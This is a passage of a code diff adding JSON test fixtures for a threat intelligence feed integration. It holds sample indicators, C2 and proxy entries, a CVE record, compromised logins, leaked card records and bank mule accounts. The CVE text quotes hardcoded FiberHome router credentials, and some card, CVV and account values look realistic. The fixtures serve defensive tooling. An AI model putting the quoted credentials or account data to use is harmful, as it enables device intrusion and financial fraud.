"indicatorMalwareRelationships": [], - "indicatorRelationships": [ - { - "sourceId": "9f3a2a244570a38e772a35d7c9171eed92bec6f7", - "targetId": "12cad1ca535a92a2ed306c0edf3025e7d9776693" - } - ], - "indicatorToolRelationships": [], - "indicators": [ - { - "description": null, - "id": "42a9929807fd954918f9bb603135754be7a6e99c", - "langs": ["en"], - "malwareList": [], - "params": { - "hashes": { - "md4": "", - "md5": "5d43baf1c9e9e3a939e5defd8f8fbd8d", - "md6": "", - "ripemd160": "", - "sha1": "d5ff73c043f3bb75dd749636307500b60a436550", - "sha224": "", - "sha256": "867c8b49d29ae1f6e4a7cd31b6fe7e278753a1ba03d4be338ed11fd1efc7dd36", - "sha384": "", - "sha512": "", - "whirlpool": "" - }, - "name": "5d43baf1c9e9e3a939e5defd8f8fbd8d", - "size": null - }, - "seqUpdate": 16107188498634, - "techSeqUpdate": null, - "title": null, - "type": "file" - }, - { - "description": null, - "id": "12cad1ca535a92a2ed306c0edf3025e7d9776693", - "langs": ["en"], - "malwareList": [], - "params": { - "domain": "some.ru", - "ipv4": ["11.11.11.11", "11.11.11.11"], - "ipv6": [], - "ssl": [], - "url": "https://some.ru" - }, - "seqUpdate": 16107188498908, - "techSeqUpdate": null, - "title": null, - "type": "network" - } - ], - "indicatorsIds": [ - "9f3a2a244570a38e772a35d7c9171eed92bec6f7", - "8b96c56cbc980c1e3362060ffa953e65281fb4df", - "42a9929807fd954918f9bb603135754be7a6e99c", - "12cad1ca535a92a2ed306c0edf3025e7d9776693" - ], - "isTailored": false, - "labels": [], - "langs": ["en", "ru"], - "malwareList": [], - "mitreMatrix": [ - { - "attackPatternId": "attack-pattern--45242287-2964-4a3e-9373-159fad4d8195", - "attackTactic": "establish-&-maintain-infrastructure", - "attackType": "pre_attack_tactics", - "id": "PRE-T1105", - "params": {"data": ""} - }, - { - "attackPatternId": "attack-pattern--0a5231ec-41af-4a35-83d0-6bdf11f28c65", - "attackTactic": "execution", - "attackType": "enterprise_tactics", - "id": null, - "params": {"data": ""} - }, - { - "attackPatternId": "attack-pattern--62b8c999-dcc0-4755-bd69-09442d9359f5", - "attackTactic": "execution", - "attackType": "enterprise_tactics", - "id": null, - "params": {"data": ""} - } - ], - "oldId": "4c01c2d4-5ebb-44d8-9e91-be89231b0eb3", - "regions": [], - "relatedThreatActors": [], - "reportNumber": "CP-2501-1653", - "sectors": ["financial-services", "finance"], - "seqUpdate": 16107218765545, - "shortDescription": null, - "shortTitle": null, - "sources": [], - "targetedCompany": [], - "targetedPartnersAndClients": [], - "techSeqUpdate": null, - "threatActor": { - "country": "KP", - "id": "5e9f20fdcf5876b5772b3d09b432f4080711ac5f", - "isAPT": true, - "name": "Lazarus" - }, - "title": "Lazarus launches new attack with cryptocurrency trading platforms", - "toolList": [], - "type": "threat", - "updatedAt": "2021-01-15T16:53:20+03:00" - }, - "suspicious_ip/tor_node": { - "dateFirstSeen": "2020-09-03T14:15:25+00:00", - "dateLastSeen": "2021-01-20T22:07:33+00:00", - "evaluation": { - "admiraltyCode": "A1", - "credibility": 90, - "reliability": 90, - "severity": "green", - "tlp": "green", - "ttl": 30 - }, - "id": "11.11.11.11", - "ipv4": { - "asn": null, - "city": null, - "countryCode": null, - "countryName": null, - "ip": "11.11.11.11", - "provider": null, - "region": null - }, - "nodes": [], - "portalLink": "https://bt.group-ib.com/suspicious/tor?searchValue=id:11.11.11.11", - "seqUpdate": 16110967720000, - "source": "check.torproject.org" - }, - "suspicious_ip/open_proxy": { - "anonymous": "High anonymous / Elite proxy", - "dateDetected": "2021-01-21T11:01:02+00:00", - "dateFirstSeen": "2020-03-19T23:01:01+00:00", - "evaluation": { - "admiraltyCode": "C3", - "credibility": 50, - "reliability": 50, - "severity": "green", - "tlp": "white", - "ttl": 15 - }, - "id": "cc6a2856da2806b03839f81aa214f22dbcfd7369", - "ipv4": { - "asn": null, - "city": null, - "countryCode": "CZ", - "countryName": "Czech Republic", - "ip": "11.11.11.11", - "provider": "DataCamp s.r.o.", - "region": null - }, - "isFavourite": false, - "isHidden": false, - "oldId": "241549215", - "port": 80, - "portalLink": "https://bt.group-ib.com/suspicious/proxies?searchValue=id:cc6a2856da2806b03839f81aa214f22dbcfd7369", - "seqUpdate": 1614925979879, - "source": "free-proxy-list.net", - "type": "http" - }, - "suspicious_ip/socks_proxy": { - "dateDetected": "2021-01-19T07:41:11+00:00", - "dateFirstSeen": "2021-01-19T07:41:11+00:00", - "dateLastSeen": "2021-01-21T08:35:46+00:00", - "evaluation": { - "admiraltyCode": "A1", - "credibility": 100, - "reliability": 90, - "severity": "green", - "tlp": "amber", - "ttl": 2 - }, - "id": "02e385600dfc5bf9b3b3656df8e0e20f5fc5c86e", - "ipv4": { - "asn": "AS60999 Libatech SAL", - "city": null, - "countryCode": "LB", - "countryName": "Lebanon", - "ip": "11.11.11.11", - "provider": "Libatech SAL", - "region": null - }, - "isFavourite": false, - "isHidden": false, - "oldId": "395880626", - "portalLink": "https://bt.group-ib.com/suspicious/socks?searchValue=id:02e385600dfc5bf9b3b3656df8e0e20f5fc5c86e", - "seqUpdate": 1614926061941, - "source": "some.ru" - }, - "malware/cnc": { - "cnc": "https://some.ru", - "dateDetected": "2021-01-21T10:35:21+00:00", - "dateLastSeen": "2021-01-21T10:35:21+00:00", - "domain": "some.ru", - "file": [], - "id": "aeed277396e27e375d030a91533aa232444d0089", - "ipv4": [ - { - "asn": "AS3356 Level 3 Communications, Inc.", - "city": null, - "countryCode": "US", - "countryName": "United States", - "ip": "11.11.11.11", - "provider": "Alibaba.com Singapore E-Commerce Private Limited", - "region": null - } - ], - "ipv6": [], - "isFavourite": false, - "isHidden": false, - "malwareList": [ - {"id": "e99c294ffe7b79655d6ef1f32add638d8a2d4b24", "name": "JS Sniffer - Poter"} - ], - "oldId": "211146923", - "platform": null, - "seqUpdate": 1614925981037, - "ssl": [], - "threatActor": null, - "url": "https://some.ru" - }, - "osi/vulnerability": { - "affectedSoftware": [ - { - "name": "fiberhome hg6245d firmware", - "operator": "le", - "version": "rp2613" - } - ], - "bulletinFamily": "NVD", - "cpe": ["cpe:/o:fiberhome:hg6245d_firmware:rp2613"], - "cpeTable": [ - { - "type": "os", - "vendor": "fiberhome", - "product": "hg6245d_firmware", - "version": "rp2613", - "string": "cpe:/o:fiberhome:hg6245d_firmware:rp2613", - "string23": "cpe:2.3:o:fiberhome:hg6245d_firmware:rp2613:*:*:*:*:*:*:*", - "part": "o", - "update": "", - "edition": "", - "language": "", - "swEdition": "", - "targetHw": "", - "other": "", - "prefix": "" - } - ], - "cveList": null, - "cvss": { - "score": 7.5, - "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P" - }, - "dateLastSeen": "2021-02-11T14:35:24+03:00", - "dateModified": "2021-02-11T00:45:00+03:00", - "datePublished": "2021-02-10T19:15:00+03:00", - "description": "An issue was discovered on FiberHome HG6245D devices through RP2613. The web daemon contains the hardcoded awnfibre / fibre@dm!n credentials for an ISP.", - "displayOptions": { - "isFavourite": false, - "isHidden": false - }, - "evaluation": { - "admiraltyCode": "A1", - "credibility": 100, - "reliability": 100, - "severity": "green", - "tlp": "green", - "ttl": 30 - }, - "exploitCount": 0, - "exploitList": [], - "extCvss": { - "base": 9.8, - "environmental": 0, - "exploitability": 3.9, - "impact": 5.9, - "mImpact": 0, - "overall": 9.8, - "temporal": 0, - "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H" - }, - "extDescription": "A vulnerability was found in FiberHome HG6245D up to RP2613 and classified as critical. This issue affects some unknown functionality of the component Web Daemon. There is no information about possible countermeasures known. It may be suggested to replace the affected object with an alternative product.", - "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2021-27152", - "id": "CVE-2021-27152", - "lastseen": "2021-02-11T14:35:24 03:00", - "portalLink": "https://bt.group-ib.com/osi/vulnerabilities?searchValue=id:CVE-2021-27152", - "provider": "some.ru", - "references": [ - "https://pierrekim.github.io/blog/2021-01-12-fiberhome-ont-0day-vulnerabilities.html#httpd-hardcoded-credentials" - ], - "reporter": "some@gmail.ru", - "seqUpdate": 16130451156953, - "softwareMixed": [ - { - "arch": [], - "hardware": "", - "hardwareVendor": "", - "hardwareVersion": "", - "os": "hg6245d_firmware", - "osVendor": "fiberhome", - "osVersion": "rp2613", - "rel": [], - "softwareFileName": "", - "softwareName": [], - "softwareType": [], - "softwareVersion": [], - "softwareVersionString": "", - "vendor": "fiberhome", - "versionOperator": "" - } - ], - "threats": [], - "threatsList": [], - "timeLineData": [], - "title": "CVE-2021-27152", - "type": "cve" - }, - "ioc/common":{ - "id": "1111111111111111111111111111111111111111", - "type": "network", - "dateFirstSeen": "2012-10-24T00:00:00Z", - "dateLastSeen": "2016-10-24T00:00:00Z", - "domain": "some.ru", - "url": "https://some.ru", - "ip": [ - "11.11.11.11" - ], - "hash": [ - "1111111111111111111111111111111111111111", - "1111111111111111111111111111111111111111111111111111111111111111", - "11111111111111111111111111111111" - ], - "seqUpdate": 16408877331936, - "malwareList": [ - { - "name": "GratefulPOS", - "aliases": [] - } - ], - "threatList": [ - { - "name": "FIN6", - "title": "Discovered GratefulPOS samples, presumably, linked with Fin6 activity" - } - ] - } -} \ No newline at end of file diff --git a/Packs/GroupIB_ThreatIntelligenceAttribution/Integrations/GroupIB_TIA_Feed/test_data/main_collections_examples.json b/Packs/GroupIB_ThreatIntelligenceAttribution/Integrations/GroupIB_TIA_Feed/test_data/main_collections_examples.json new file mode 100644 index 000000000000..64a5e8366f8e --- /dev/null +++ b/Packs/GroupIB_ThreatIntelligenceAttribution/Integrations/GroupIB_TIA_Feed/test_data/main_collections_examples.json @@ -0,0 +1,19588 @@ +{ + "compromised/account_group":{ + "count": 630118817, + "items": [ + { + "id": "96339c2618783a2ffd3fe3f0e855bc63b4890688", + "dateFirstSeen": "2013-05-21T00:00:00+00:00", + "dateLastSeen": "2013-05-21T00:00:00+00:00", + "dateFirstCompromised": null, + "dateLastCompromised": null, + "port": null, + "login": "examplelogin", + "password": "123456789", + "parsedLogin": { + "domain": null, + "ip": null + }, + "service": { + "domain": "example.example.com", + "ip": null, + "url": "http://example.example.com/", + "host": "example.example.com" + }, + "events": [ + { + "id": "63b797f8b9924391d6669f55b80bbb43f1a7f285", + "oldId": "6285", + "stixGuid": "1db49a6a-4844-4d80-d2a6-e990a14bcba2", + "cnc": { + "cnc": "", + "domain": null, + "ipv4": null, + "ipv6": null, + "url": null + }, + "client": { + "ipv4": { + "asn": "AS1111", + "city": "City", + "region": "Europe", + "provider": "LLC Orange Business Services", + "countryCode": "NL", + "countryName": "Netherlands", + "ip": "1.1.0.1" + }, + "ipv6": null + }, + "source": { + "id": "", + "type": "", + "idType": "" + }, + "person": null, + "malware": null, + "threatActor": null, + "dateDetected": "2013-05-21T00:00:00+00:00", + "dateCompromised": null, + "additionalData": null + } + ], + "eventCount": 1, + "silentInsert": null, + "evaluation": { + "admiraltyCode": "A2", + "credibility": 80, + "reliability": 100, + "severity": "red", + "tlp": "red", + "ttl": 30 + }, + "seqUpdate": 1450014347005000, + "displayOptions": { + "favouriteForCompanies": [], + "hideForCompanies": [], + "isHidden": false, + "isFavourite": false + }, + "malware": [], + "threatActor": [], + "source": [], + "sourceType": [], + "sourceId": [] + }, + { + "id": "62ecbec64a7c69bebb8894fcef3ac848e74080b1", + "dateFirstSeen": "2013-05-21T00:00:00+00:00", + "dateLastSeen": "2013-05-21T00:00:00+00:00", + "dateFirstCompromised": null, + "dateLastCompromised": null, + "port": null, + "login": "loginexample", + "password": "password123", + "parsedLogin": { + "domain": null, + "ip": null + }, + "service": { + "domain": "example.example.com", + "ip": null, + "url": "http://example.example.com/", + "host": "example.example.com" + }, + "events": [ + { + "id": "26ae9e9017a7ccd6be71640a55976b3e1172c492", + "oldId": "6291", + "stixGuid": "f57e7a34-91a6-567f-fbab-d204cf9e132b", + "cnc": { + "cnc": "", + "domain": null, + "ipv4": null, + "ipv6": null, + "url": null + }, + "client": { + "ipv4": { + "asn": "AS1111", + "city": "City", + "region": "Europe", + "provider": "LLC Orange Business Services", + "countryCode": "NL", + "countryName": "Netherlands", + "ip": "1.1.0.1" + }, + "ipv6": null + }, + "source": { + "id": "", + "type": "", + "idType": "" + }, + "person": null, + "malware": null, + "threatActor": null, + "dateDetected": "2013-05-21T00:00:00+00:00", + "dateCompromised": null, + "additionalData": null + } + ], + "eventCount": 1, + "silentInsert": null, + "evaluation": { + "admiraltyCode": "A2", + "credibility": 80, + "reliability": 100, + "severity": "red", + "tlp": "red", + "ttl": 30 + }, + "seqUpdate": 1450014347013000, + "displayOptions": { + "favouriteForCompanies": [], + "hideForCompanies": [], + "isHidden": false, + "isFavourite": false + }, + "malware": [], + "threatActor": [], + "source": [], + "sourceType": [], + "sourceId": [] + }, + { + "id": "ba987664a068419d7e6e9ea8988df0e7b38b2f14", + "dateFirstSeen": "2013-05-21T00:00:00+00:00", + "dateLastSeen": "2013-05-21T00:00:00+00:00", + "dateFirstCompromised": null, + "dateLastCompromised": null, + "port": null, + "login": "12345", + "password": "12345", + "parsedLogin": { + "domain": null, + "ip": null + }, + "service": { + "domain": "example.example.com", + "ip": null, + "url": "http://example.example.com/", + "host": "example.example.com" + }, + "events": [ + { + "id": "eabc301dc60356c65ac7256ee1ba528f8422cd33", + "oldId": "6300", + "stixGuid": "3bfaab11-e4f9-49a9-faf8-eb1f029b39a3", + "cnc": { + "cnc": "", + "domain": null, + "ipv4": null, + "ipv6": null, + "url": null + }, + "client": { + "ipv4": { + "asn": null, + "city": null, + "region": null, + "provider": null, + "countryCode": null, + "countryName": null, + "ip": "192.168.0.1" + }, + "ipv6": null + }, + "source": { + "id": "", + "type": "", + "idType": "" + }, + "person": null, + "malware": null, + "threatActor": null, + "dateDetected": "2013-05-21T00:00:00+00:00", + "dateCompromised": null, + "additionalData": null + } + ], + "eventCount": 1, + "silentInsert": null, + "evaluation": { + "admiraltyCode": "A2", + "credibility": 80, + "reliability": 100, + "severity": "red", + "tlp": "red", + "ttl": 30 + }, + "seqUpdate": 1450014347019000, + "displayOptions": { + "favouriteForCompanies": [], + "hideForCompanies": [], + "isHidden": false, + "isFavourite": false + }, + "malware": [], + "threatActor": [], + "source": [], + "sourceType": [], + "sourceId": [] + } + ], + "settings": { + "search": { + "tags": [ + "hr_cnc_country", + "hr_victim_country", + "victim_country", + "victim_ip", + "cnc_ip_country_name", + "service_domain", + "service_domain.tree", + "service_ip", + "login_domain", + "login_domain.tree", + "login_ip", + "cnc_domain", + "cnc_domain.tree", + "cnc_ip", + "threat_actor", + "malware", + "source", + "source_type", + "severity", + "seqUpdate", + "options", + "few_events", + "ip", + "domain", + "domain.tree", + "id", + "os_family", + "os_details", + "antivirus_software", + "os_architecture", + "system_locale", + "stealer_build", + "probable_corporate_access", + "notification_id" + ], + "fields": [ + "victim_country", + "victim_ip", + "cnc_ip_country_name", + "threat_actor", + "service_domain", + "service_domain.tree", + "service_ip", + "login_domain", + "login_domain.tree", + "login_ip", + "cnc_domain", + "cnc_domain.tree", + "cnc_ip", + "malware", + "source", + "source_type", + "severity", + "seqUpdate", + "event_count", + "id", + "login", + "email", + "ip", + "domain", + "domain.tree", + "dateFirstCompromised", + "dateLastCompromised", + "host_hwid", + "host_domain", + "host_domain.tree", + "host_pcname", + "host_malware_path" + ], + "sorts": [ + "first_seen", + "last_seen", + "date_first_compromised", + "date_last_compromised", + "seqUpdate" + ] + } + }, + "seqUpdate": 1450014347019000 + }, + "compromised/bank_card_group":{ + "count": 534786, + "items": [ + { + "id": "1a07ffa146409f1ed51675155b54b81a4257a742", + "baseName": null, + "serviceCode": null, + "cardInfo": { + "type": "PERSONAL", + "system": "DISCOVER", + "issuer": { + "countryCode": "US", + "issuer": "DISCOVER BANK" + }, + "number": "1111111111111111", + "bin": [ + "111111" + ] + }, + "events": [ + { + "id": "45ba38d145df986e00a0a1a81814048a87282f2a", + "cardInfo": { + "dump": null, + "cvv": "240", + "pin": null, + "validThruDate": "2021-09-30", + "validThru": "09/2021" + }, + "client": { + "ipv4": null, + "ipv6": null + }, + "cnc": { + "cnc": "", + "port": null, + "domain": null, + "proto": null, + "ipv4": null, + "ipv6": null, + "url": null, + "stixGuid": null + }, + "price": null, + "malware": { + "name": "Data Leak", + "id": "eb54701b1b9e46d01505c9e7f6d0214f2a90cf03", + "stixGuid": "475fcc52-ca48-c451-f232-f9b009ac2a73" + }, + "threatActor": { + "name": "VMCARD", + "id": "61b4097bdc7554a0f46279d01eadf016c60c58bc", + "stixGuid": "8e1fa810-d259-5c57-5261-874f5c2b2cdd", + "isAPT": false + }, + "owner": { + "address": null, + "birthday": null, + "countryCode": "US", + "email": null, + "name": null, + "region": null, + "passport": null, + "phone": null, + "state": null, + "taxNumber": null, + "zip": null + }, + "dateCompromised": "2022-11-10T16:03:00+00:00", + "dateDetected": "2022-11-15T07:20:30+00:00", + "source": { + "id": "https://anonfiles.com/F5SeMbG0y4/120k_txt", + "type": "Leak", + "idType": null + }, + "isDump": false, + "isExpired": true, + "oldId": "976570125", + "externalId": "", + "track": [] + } + ], + "eventCount": 1, + "dateFirstSeen": "2022-11-15T07:20:30+00:00", + "dateLastSeen": "2022-11-15T07:20:30+00:00", + "dateFirstCompromised": "2022-11-10T16:03:00+00:00", + "dateLastCompromised": "2022-11-10T16:03:00+00:00", + "evaluation": { + "admiraltyCode": "C3", + "credibility": 50, + "reliability": 50, + "severity": "orange", + "tlp": "red", + "ttl": 90 + }, + "seqUpdate": 1673147825395, + "stixGuid": "8bd1a0ae-2191-d411-c025-332e37e115ba", + "silentInsert": true, + "isMasked": false, + "displayOptions": { + "favouriteForCompanies": [], + "ignoreForCompanies": [], + "hideForCompanies": [], + "isHidden": false, + "isIgnore": false, + "isFavourite": false + }, + "malware": [ + { + "name": "Data Leak", + "id": "eb54701b1b9e46d01505c9e7f6d0214f2a90cf03" + } + ], + "threatActor": [ + { + "name": "VMCARD", + "id": "61b4097bdc7554a0f46279d01eadf016c60c58bc" + } + ], + "source": [ + { + "id": "https://anonfiles.com/F5SeMbG0y4/120k_txt", + "type": "Leak", + "idType": "" + } + ], + "sourceId": [ + "https://anonfiles.com/F5SeMbG0y4/120k_txt" + ], + "sourceType": [ + "Leak" + ] + }, + { + "id": "f4d32fd739748e75d48a3f397536356e0031a1c3", + "baseName": null, + "serviceCode": null, + "cardInfo": { + "type": "PERSONAL", + "system": "DISCOVER", + "issuer": { + "countryCode": "US", + "issuer": "DISCOVER BANK" + }, + "number": "1111111111111110", + "bin": [ + "111111" + ] + }, + "events": [ + { + "id": "45ba38d145df986e00a0a1a81814048a87282f2a", + "cardInfo": { + "dump": null, + "cvv": "409", + "pin": null, + "validThruDate": "2022-07-31", + "validThru": "07/2022" + }, + "client": { + "ipv4": null, + "ipv6": null + }, + "cnc": { + "cnc": "", + "port": null, + "domain": null, + "proto": null, + "ipv4": null, + "ipv6": null, + "url": null, + "stixGuid": null + }, + "price": null, + "malware": { + "name": "Data Leak", + "id": "eb54701b1b9e46d01505c9e7f6d0214f2a90cf03", + "stixGuid": "475fcc52-ca48-c451-f232-f9b009ac2a73" + }, + "threatActor": { + "name": "VMCARD", + "id": "61b4097bdc7554a0f46279d01eadf016c60c58bc", + "stixGuid": "8e1fa810-d259-5c57-5261-874f5c2b2cdd", + "isAPT": false + }, + "owner": { + "address": null, + "birthday": null, + "countryCode": "US", + "email": null, + "name": null, + "region": null, + "passport": null, + "phone": null, + "state": null, + "taxNumber": null, + "zip": null + }, + "dateCompromised": "2022-11-10T16:03:00+00:00", + "dateDetected": "2022-11-15T07:20:30+00:00", + "source": { + "id": "https://anonfiles.com/F5SeMbG0y4/120k_txt", + "type": "Leak", + "idType": null + }, + "isDump": false, + "isExpired": true, + "oldId": "976570179", + "externalId": "", + "track": [] + } + ], + "eventCount": 1, + "dateFirstSeen": "2022-11-15T07:20:30+00:00", + "dateLastSeen": "2022-11-15T07:20:30+00:00", + "dateFirstCompromised": "2022-11-10T16:03:00+00:00", + "dateLastCompromised": "2022-11-10T16:03:00+00:00", + "evaluation": { + "admiraltyCode": "C3", + "credibility": 50, + "reliability": 50, + "severity": "orange", + "tlp": "red", + "ttl": 90 + }, + "seqUpdate": 1673147827461, + "stixGuid": "22a20ce1-72ba-082b-16c3-c2465c613782", + "silentInsert": true, + "isMasked": false, + "displayOptions": { + "favouriteForCompanies": [], + "ignoreForCompanies": [], + "hideForCompanies": [], + "isHidden": false, + "isIgnore": false, + "isFavourite": false + }, + "malware": [ + { + "name": "Data Leak", + "id": "eb54701b1b9e46d01505c9e7f6d0214f2a90cf03" + } + ], + "threatActor": [ + { + "name": "VMCARD", + "id": "61b4097bdc7554a0f46279d01eadf016c60c58bc" + } + ], + "source": [ + { + "id": "https://anonfiles.com/F5SeMbG0y4/120k_txt", + "type": "Leak", + "idType": "" + } + ], + "sourceId": [ + "https://anonfiles.com/F5SeMbG0y4/120k_txt" + ], + "sourceType": [ + "Leak" + ] + }, + { + "id": "5b53acb50d9954d5a8f8455400747931568c8ead", + "baseName": null, + "serviceCode": null, + "cardInfo": { + "type": "PERSONAL", + "system": "DISCOVER", + "issuer": { + "countryCode": "US", + "issuer": "DISCOVER BANK" + }, + "number": "1111111111111112", + "bin": [ + "111111" + ] + }, + "events": [ + { + "id": "45ba38d145df986e00a0a1a81814048a87282f2a", + "cardInfo": { + "dump": null, + "cvv": "989", + "pin": null, + "validThruDate": "2022-09-30", + "validThru": "09/2022" + }, + "client": { + "ipv4": null, + "ipv6": null + }, + "cnc": { + "cnc": "", + "port": null, + "domain": null, + "proto": null, + "ipv4": null, + "ipv6": null, + "url": null, + "stixGuid": null + }, + "price": null, + "malware": { + "name": "Data Leak", + "id": "eb54701b1b9e46d01505c9e7f6d0214f2a90cf03", + "stixGuid": "475fcc52-ca48-c451-f232-f9b009ac2a73" + }, + "threatActor": { + "name": "VMCARD", + "id": "61b4097bdc7554a0f46279d01eadf016c60c58bc", + "stixGuid": "8e1fa810-d259-5c57-5261-874f5c2b2cdd", + "isAPT": false + }, + "owner": { + "address": null, + "birthday": null, + "countryCode": "US", + "email": null, + "name": null, + "region": null, + "passport": null, + "phone": null, + "state": null, + "taxNumber": null, + "zip": null + }, + "dateCompromised": "2022-11-10T16:03:00+00:00", + "dateDetected": "2022-11-15T07:20:30+00:00", + "source": { + "id": "https://anonfiles.com/F5SeMbG0y4/120k_txt", + "type": "Leak", + "idType": null + }, + "isDump": false, + "isExpired": true, + "oldId": "976570208", + "externalId": "", + "track": [] + } + ], + "eventCount": 1, + "dateFirstSeen": "2022-11-15T07:20:30+00:00", + "dateLastSeen": "2022-11-15T07:20:30+00:00", + "dateFirstCompromised": "2022-11-10T16:03:00+00:00", + "dateLastCompromised": "2022-11-10T16:03:00+00:00", + "evaluation": { + "admiraltyCode": "C3", + "credibility": 50, + "reliability": 50, + "severity": "orange", + "tlp": "red", + "ttl": 90 + }, + "seqUpdate": 1673147828497, + "stixGuid": "49607d22-648a-39ae-485f-db32b2e3ac96", + "silentInsert": true, + "isMasked": false, + "displayOptions": { + "favouriteForCompanies": [], + "ignoreForCompanies": [], + "hideForCompanies": [], + "isHidden": false, + "isIgnore": false, + "isFavourite": false + }, + "malware": [ + { + "name": "Data Leak", + "id": "eb54701b1b9e46d01505c9e7f6d0214f2a90cf03" + } + ], + "threatActor": [ + { + "name": "VMCARD", + "id": "61b4097bdc7554a0f46279d01eadf016c60c58bc" + } + ], + "source": [ + { + "id": "https://anonfiles.com/F5SeMbG0y4/120k_txt", + "type": "Leak", + "idType": "" + } + ], + "sourceId": [ + "https://anonfiles.com/F5SeMbG0y4/120k_txt" + ], + "sourceType": [ + "Leak" + ] + } + ], + "settings": { + "search": { + "tags": [ + "card_system", + "card_type", + "card_issuer", + "malware", + "source_type", + "source", + "owner_country_code", + "is_masked", + "is_dump", + "is_expired", + "company", + "company_id", + "bin", + "severity", + "options", + "has_zip", + "hasnt_filled_zip", + "threat_actor", + "seqUpdate", + "few_events", + "ip", + "domain", + "domain.tree", + "notification_id", + "id" + ], + "fields": [ + "card_system", + "card_type", + "card_issuer", + "malware", + "cybercrime", + "source_type", + "source", + "owner_country_code", + "is_masked", + "is_dump", + "is_expired", + "company", + "company_id", + "threat_actor", + "cnc_domain", + "cnc_domain.tree", + "cnc_ip", + "bin", + "cardInfo.number", + "severity", + "seqUpdate", + "event_count", + "id", + "ip", + "domain", + "domain.tree", + "date_first_compromised", + "date_last_compromised", + "dateFirstCompromised", + "dateLastCompromised" + ], + "sorts": [ + "first_seen", + "last_seen", + "date_first_compromised", + "date_last_compromised", + "seqUpdate" + ] + } + }, + "seqUpdate": 1673147828497 + }, + "compromised/mule":{ + "count": 35251, + "items": [ + { + "id": "5eb9ccb5081203e82ac1159e44747a6af4bb7391", + "account": "4351391043922426", + "cnc": { + "cnc": "", + "port": null, + "domain": null, + "proto": null, + "ipv4": { + "asn": null, + "city": null, + "region": null, + "provider": null, + "countryCode": null, + "countryName": null, + "ip": null + }, + "ipv6": null, + "url": null, + "stixGuid": null + }, + "dateAdd": "2015-08-07T16:00:40+00:00", + "dateIncident": "2015-07-23T20:00:00+00:00", + "evaluation": { + "admiraltyCode": "A2", + "credibility": 80, + "reliability": 100, + "severity": "red", + "tlp": "amber", + "ttl": 30 + }, + "hash": "2a006b1d3bc002c4fb133d6b74bd2f09", + "info": null, + "malware": null, + "oldId": "44453", + "operatorClabe": null, + "organization": { + "bic": null, + "bicRu": null, + "bsb": null, + "iban": null, + "name": "ОАО АКБ \"УРАЛ ФД\"", + "swift": null, + "clabe": null + }, + "person": { + "address": null, + "birthday": null, + "countryCode": null, + "email": null, + "name": null, + "region": null, + "passport": null, + "phone": null, + "state": null, + "taxNumber": null + }, + "seqUpdate": 1454699132268, + "sourceType": null, + "stixGuid": "daae3751-e9d1-210d-cf53-cbb5e76bbaa4", + "threatActor": null, + "type": "Person", + "displayOptions": { + "favouriteForCompanies": [], + "hideForCompanies": [ + 3146 + ], + "isHidden": false, + "isFavourite": false + } + }, + { + "id": "7db6ee3515cc1a019b057a32210e1d95090dac88", + "account": "4351391043368307", + "cnc": { + "cnc": "", + "port": null, + "domain": null, + "proto": null, + "ipv4": { + "asn": null, + "city": null, + "region": null, + "provider": null, + "countryCode": null, + "countryName": null, + "ip": null + }, + "ipv6": null, + "url": null, + "stixGuid": null + }, + "dateAdd": "2015-07-20T15:34:03+00:00", + "dateIncident": "2015-07-05T20:00:00+00:00", + "evaluation": { + "admiraltyCode": "A2", + "credibility": 80, + "reliability": 100, + "severity": "red", + "tlp": "amber", + "ttl": 30 + }, + "hash": "e193977ea8efc516319904b340a5901d", + "info": null, + "malware": null, + "oldId": "23398", + "operatorClabe": null, + "organization": { + "bic": null, + "bicRu": null, + "bsb": null, + "iban": null, + "name": "ОАО АКБ \"УРАЛ ФД\"", + "swift": null, + "clabe": null + }, + "person": { + "address": null, + "birthday": null, + "countryCode": null, + "email": null, + "name": null, + "region": null, + "passport": null, + "phone": null, + "state": null, + "taxNumber": null + }, + "seqUpdate": 1454699133282, + "sourceType": null, + "stixGuid": "d1ce6a9a-76c5-fbba-a5db-9b72ac2a97c7", + "threatActor": { + "name": "Zolotoe Leto", + "id": "2423e5cadf51f21ab36509377ba7f7d629503298", + "stixGuid": "e0b79cef-8eb0-7768-29a8-112bc66066cf", + "isAPT": false + }, + "type": "Person", + "displayOptions": { + "favouriteForCompanies": [], + "hideForCompanies": [ + 3146 + ], + "isHidden": false, + "isFavourite": false + } + }, + { + "id": "92c0c55c48b22e70e4118535dc0a7b63134ec4ad", + "account": "4351391043068758", + "cnc": { + "cnc": "", + "port": null, + "domain": null, + "proto": null, + "ipv4": { + "asn": null, + "city": null, + "region": null, + "provider": null, + "countryCode": null, + "countryName": null, + "ip": null + }, + "ipv6": null, + "url": null, + "stixGuid": null + }, + "dateAdd": "2015-07-20T15:33:41+00:00", + "dateIncident": "2015-07-09T20:00:00+00:00", + "evaluation": { + "admiraltyCode": "A2", + "credibility": 80, + "reliability": 100, + "severity": "red", + "tlp": "amber", + "ttl": 30 + }, + "hash": "69ec671f1666120040d907fdd0cd577f", + "info": null, + "malware": null, + "oldId": "22984", + "operatorClabe": null, + "organization": { + "bic": null, + "bicRu": null, + "bsb": null, + "iban": null, + "name": "ОАО АКБ \"УРАЛ ФД\"", + "swift": null, + "clabe": null + }, + "person": { + "address": null, + "birthday": null, + "countryCode": null, + "email": null, + "name": null, + "region": null, + "passport": null, + "phone": null, + "state": null, + "taxNumber": null + }, + "seqUpdate": 1454699133295, + "sourceType": null, + "stixGuid": "50bc844f-25fe-17ef-b5f3-dc170684e718", + "threatActor": { + "name": "Zolotoe Leto", + "id": "2423e5cadf51f21ab36509377ba7f7d629503298", + "stixGuid": "e0b79cef-8eb0-7768-29a8-112bc66066cf", + "isAPT": false + }, + "type": "Person", + "displayOptions": { + "favouriteForCompanies": [], + "hideForCompanies": [ + 3146 + ], + "isHidden": false, + "isFavourite": false + } + } + ], + "settings": { + "search": { + "tags": [ + "id", + "type", + "operator", + "threat_actor", + "malware", + "source", + "severity", + "options", + "seqUpdate", + "cnc_domain", + "cnc_domain.tree", + "cnc_ip", + "notification_id" + ], + "fields": [ + "account", + "type", + "operator", + "threat_actor", + "severity", + "source", + "malware", + "id", + "seqUpdate", + "domain", + "domain.tree", + "ip", + "cnc_domain", + "cnc_domain.tree", + "cnc_ip" + ], + "sorts": [ + "date_add", + "seqUpdate" + ] + } + }, + "seqUpdate": 1454699133295 + }, + "attacks/ddos":{ + "count": 44739317, + "items": [ + { + "id": "7927ec532db08b2e420b33cff2a9068ca8487e76", + "cnc": { + "cnc": "6lxdx.s3.amazonaws.com", 